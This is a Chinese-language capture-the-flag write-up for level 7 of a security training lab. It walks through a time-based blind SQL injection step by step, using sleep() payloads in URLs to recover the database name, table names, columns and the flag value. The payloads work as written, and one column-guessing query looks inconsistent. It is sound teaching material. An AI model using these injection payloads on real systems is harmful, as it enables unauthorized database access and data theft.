网络信息安全攻防学习平台第7关

1.确定数据库名长度
输入
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(length((SELECT concat(database())))=5,sleep(10),0)--+
猜测数据库长度，当为5等待响应时间很长。
2.猜测数据库名
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select concat(database())),1,1))="109",sleep(10),0)--+
一个一个字符的猜解数据库名的名称，第一个字符为m
经测试，当执行
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select concat(database())),1,5)="mydbs",sleep(10),0)--+
等待响应时间很长，故数据库名称为mydbs
3.猜解表单
第一个 log
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 0,1),1,3)='log',sleep(2),1)--+

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 0,1),1,1))=108,sleep(2),1)--+

第二个 motto
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 1,1),1,5)='motto',sleep(2),1)--+

第三个 user
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 2,1),1,4)='user',sleep(2),1)--+

4.猜解字段
motto表里的motto字段
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select COLUMN_NAME from information_schema.columns where table_name=0x6D6F74746F limit 1,1 ),1,4))='user',sleep(2),1)--+

5.猜解字段内容
执行
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select motto from motto limit 3,1 ),1,14)="key#notfound!#",sleep(2),1)--+
网站响应时间长，得到字段内容key:notfound!
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select motto from motto limit 3,1 ),{},1))={},sleep(2),1)--+

6.手注实属麻烦，编写简单的python脚本注。

来源：https://www.cnblogs.com/ersuani/p/12558597.html